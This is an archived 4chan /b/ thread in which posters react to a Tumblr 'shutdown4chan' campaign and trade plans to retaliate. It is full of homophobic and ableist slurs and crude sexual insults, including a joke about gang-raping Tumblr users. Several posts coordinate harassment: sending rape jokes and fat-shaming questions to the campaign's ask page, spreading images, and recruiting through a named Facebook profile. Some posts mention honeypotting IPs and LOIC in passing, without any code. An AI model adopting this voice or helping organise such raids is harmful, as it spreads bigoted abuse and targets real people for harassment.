"Hey guys, let's get together and talk about what we can do to get back at tumblr for threatening us!!!"
Do you have cocks in every orifice? I'd at least get the ones out of your eye sockets and look at how gay you are, anyway.
>>
can anyone confirm whether we have mods that are going to leak IP addresses on july 4th?

if we all add ourselves as nodes to tor and the mods post their IPs we can honeypot a small percentage of them.
>>
>>552480157
>Implying you can leave 4chan
>>
File: 1403378875102s.jpg (2 KB, 112x125) Image search: [iqdb] [SauceNao] [Google]
1403378875102s.jpg
2 KB, 112x125
>>552460771
they figured out
>>
>>552480327
Mods and janitors seem okay with this shit since it hasn't 404'd
>>
>>552478142
>Who gives a fuck people are still involved in it and still are going to do something either way troll or not we fuck with the users following shit and it looks like a swagfag teen girl on her period running it


If you want to fuck with tumblr users, then go ahead, by all means. You don't have to look like a faggot in the process by being baited in to doing something by a bigger retard than yourself.
>>
>>552480723
>by a bigger retard than yourself
is that even possible?
>>
File: 1400285224505.jpg (39 KB, 464x346) Image search: [iqdb] [SauceNao] [Google]
1400285224505.jpg
39 KB, 464x346
Summer fag infested thread. Jesus fucking christ.
>>
Duhhh fucking help them of course
>>
>>552477517
i love you man but that shit is stale
>>
>>552461119
I'll bet they will send us cats
>Jokes on them
>>
I just found this
http://shutdown4chan.tumblr.com/post/88873101483/a-brief-introduction-to-what-the-4chan-website-is
So, /b/, just how accurate would you say this is?
>>
ooooor ... or we could just show our best site at the 4th and just post "racism isnt okay guys" and "feminism will help us all" threads - when all these moral fags come here to see that racist site and check if the "attack" worked - they would think we arent that bad ... and will let us alone in the future ...

.... and when they turn around and go back to tumblr we will stab then in the back and gangrape their edgy asses!

... i know this is not going to happen
>>
>>552481286
>... i know this is not going to happen
you could not be more correct.
>>
>>552481286
>>552481419
ya.
>>
>>552480253
My bro heaven right on the money with his assessment of the situation.
>>
File: watchout.jpg (9 KB, 480x360) Image search: [iqdb] [SauceNao] [Google]
watchout.jpg
9 KB, 480x360
>>552460590
We do what we always do, shitpost. It's an artform, of intricate butt rustling that not even the extreme open mindedness of tumblr-fags everywhere could stop, it will merge with other shitposts and becom lost to the shit waves, watchvout bubbles, the shit hawks are coming.
>>
ITT: faggots who don't know /pol/ organized this, too.
>>
>>552481286
bring out the roody-poos
>>
File: fist.jpg (29 KB, 468x458) Image search: [iqdb] [SauceNao] [Google]
fist.jpg
29 KB, 468x458
>>552481690
yup yup

>>552481927
who the fuck cares about anything that /pol/ has to say about anything?
>>
>>552481830
you got yourself a hair triggered double barrelled shit machine gun and heres the thing anon it pointed right at you
>>
Could've already been posted but here's the video, spread it around
http://m.youtube.com/watch?v=UG6xvfuS71M
>>
File: k.png (124 KB, 600x1200) Image search: [iqdb] [SauceNao] [Google]
k.png
124 KB, 600x1200
Everyone ask your facebook friends and 12 years old sisters to share this image on 9gag and tumblr.
>>
>>552482248
>spread it around
please, for the love of all creatures great and small...
don't spread this around.
it makes you look like a faggot in a field of throbbing cocks.
>>
>>552482248
Spread the video around and add
fb dot com slash kevin.prit.1 and send me a message if you want to assist in taking a active part in fucking with Tumblr and the users supporting the anti 4chan page
>>
File: 1401493558165.gif (2 MB, 320x240) Image search: [iqdb] [SauceNao] [Google]
1401493558165.gif
2 MB, 320x240
>>552482230
I don't know if it's a ruse or not, but these folks act like they don't know that everyone is shitposting. Everything is shitpost, it's like I'm the only one who's been *shitpilled* and can see the inner workings of this shit interface. It's a field of shit, waiting to blow...
>>
>>552461484
>https://www.youtube.com/watch?v=S1woxkraClg&feature=kp
>>We do nothing we look like pussies

Or maybe they can't do anything to us so they just flounder on our page unsuccessfully
>>
>>552482581
I think they're retarded enough to believe in this shit.
>>
File: shutdown.jpg (106 KB, 902x825) Image search: [iqdb] [SauceNao] [Google]
shutdown.jpg
106 KB, 902x825
>>552468404
>>
>>552482952
>Or maybe they can't do anything to us so they just flounder on our page unsuccessfully

Exactly what will happen.

But it's fun to troll them anyway.

But, this makes me wonder, what if the guy with the tumblr account is actually trolling all of us? What if he's one of us making us think we're getting attacked by him? I'd say 9/10 for that shit.
>>
>>552482707
>Spread the video around and add
>fb dot com slash kevin.prit.1 and send me a message
be sure to wear your Affliction shirts and drink plenty of Monster and say "bro" a lot while you're discussing your grand scheme.
>>
File: honk butt.png (978 KB, 1277x961) Image search: [iqdb] [SauceNao] [Google]
honk butt.png
978 KB, 1277x961
>>552473737
>4chan.com
>being this new
>>
File: 1402595280805.png (191 KB, 480x360) Image search: [iqdb] [SauceNao] [Google]
1402595280805.png
191 KB, 480x360
>>552482248
tfw i posted this on tumblr so everyone could laugh at it
>>
>>552482248
>http://m.youtube.com/watch?v=UG6xvfuS71M

Saving this link for a cringe thread
>>
>>552483109
Exactly? Lol
>>
File: asshole.gif (2 MB, 320x240) Image search: [iqdb] [SauceNao] [Google]
asshole.gif
2 MB, 320x240
>>552473519
No not porn.... how dare they.....

I mean do they have no respect for all the women on here who could be effected?

Are they trying to trigger them?

>Gif Related, it sums up everything
>>
>>552472426
>Using proxies on 4chan
>Proxies don't work on 4chan
>>
>>552483409
Creepy as fuck
>>
File: 1385004388826.jpg (12 KB, 350x300) Image search: [iqdb] [SauceNao] [Google]
1385004388826.jpg
12 KB, 350x300
>>552483147
of all the things they could pick, they decided that the LOIC part is bad?
wow they are dumb
>>
>>552460590
We funnel their attacks towards /pol/ and moot views it as the final straw and closes /pol/ down for good because it is not worth the trouble.
>>
>>552483147

omg is working they reblogging it
see this:
http://loveharmonywar.tumblr.com/post/88424352478/daxzee-feminists-you-wanna-help-out-the-cause
>>
>>552460771
Just posted this to tumblr.
>>
>>552483973
that's why my green cmd shit's gonna get them hard. No malware , just you and a green command line.

>>552482454
>>
File: 1395171735560.jpg (21 KB, 300x300) Image search: [iqdb] [SauceNao] [Google]
1395171735560.jpg
21 KB, 300x300
>>552484040
NO
>>
File: jimcroce.jpg (7 KB, 300x300) Image search: [iqdb] [SauceNao] [Google]
jimcroce.jpg
7 KB, 300x300
>>552484040

now THAT is fucking genius.
>>
>>552482454
>implying there aren't tumblrfaggots in this thread, right now, watching the faggotry
>>
>>552484273
they're probably not going to know how to open cmd
>>
If it becomes obvious then just post Triggering content about rape, male domination and so on.
>>
>>552484474
why havent you called moot yet? your normally first to cry about this shit with people mentionin raids
>>
>>552482707
>implying a tumblrdouche won't infiltrate that in a New York minute
>>
File: k.png (124 KB, 600x1200) Image search: [iqdb] [SauceNao] [Google]
k.png
124 KB, 600x1200
>>552484591
fixed
>>
File: 4chan-tumblr-2014.png (75 KB, 1403x533) Image search: [iqdb] [SauceNao] [Google]
4chan-tumblr-2014.png
75 KB, 1403x533
>>552460590
Tonight we dine in heck.
>>
>>552484357
I'm not particularly bothered with racist content on 4chan but /pol/ has ruined most of the other boards as of the last couple years. I'm sure moot has thought of removing /pol/ for a long time, if it becomes too much trouble for him personally, it will be gone.
>>
File: image.jpg (38 KB, 355x325) Image search: [iqdb] [SauceNao] [Google]
image.jpg
38 KB, 355x325
This is gettin me all fired up
>>
>>552484940
if you get rid of pol those arseholes are just gonna come in here
>>
>>552484940
But if he does that, the cancer floods to the other boards.
The gates have been opened already, to close them now would be disastrous.
>>
File: kseals.png (137 KB, 600x1200) Image search: [iqdb] [SauceNao] [Google]
kseals.png
137 KB, 600x1200
>>552484782
Added seals to make it legit
>>
File: yoodon goofd.png (4 KB, 500x500) Image search: [iqdb] [SauceNao] [Google]
yoodon goofd.png
4 KB, 500x500
>>552462124
>>
This hasn't really been getting traction on tumblr
>>
>>552485128
/pol/ack here.

THink /mlp/ and /lgbt/ and /s4s/

all are things that didnt exist last time /new/ was destroyed

We infiltrated them and have it planned out how to distribute mayhem out of those boards into the rest of 4chan. On top of how we learned to cause chaos after /new/ was shut down

We have perceived of everything. This will be the sixth time moot has destroyed /pol/ and we have become exceedingly good at causing a shit storm
>>
>>552461256
This post made me spit out my soda
>>
>>552484782
i love it
>>
File: 1390229178105.gif (2 MB, 266x148) Image search: [iqdb] [SauceNao] [Google]
1390229178105.gif
2 MB, 266x148
>mfw this whole thread, and the very idea of anyone raiding /b/
>>
>raiding /b/

they probably won't even figure out how to fucking post something. tumblr is cancer
>>
>>552485128
>>552485171
They already do. There are always multiple /pol/ tier threads on almost every board. The only boards immune are boards such as /a/ and /mlp/ since they are already infected with their own cancer.
>>
File: I need it.jpg (97 KB, 780x824) Image search: [iqdb] [SauceNao] [Google]
I need it.jpg
97 KB, 780x824
Ask it shit like "Are you a land whale?" or "Tell me your favorite rape joke? They are just hilarious"
http://shutdown4chan.tumblr.com/ask
>>
File: pol takedown.jpg (257 KB, 1440x900) Image search: [iqdb] [SauceNao] [Google]
pol takedown.jpg
257 KB, 1440x900
>>552485171
I think we should do this. It will improve the health of 4chan and make things just a little bit better for good.
Thread replies: 302
Thread images: 68
Thread DB ID: 2284



[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vip /vp / vr / w / wg / wsg / wsr / x / y] [Search | Home]

[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vip /vp / vr / w / wg / wsg / wsr / x / y] [Search | Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the shown content originated from that site. This means that 4Archive shows their content, archived. If you need information for a Poster - contact them.
If a post contains personal/copyrighted/illegal content, then use the post's [Report] link! If a post is not removed within 24h contact me at [email protected] with the post's information.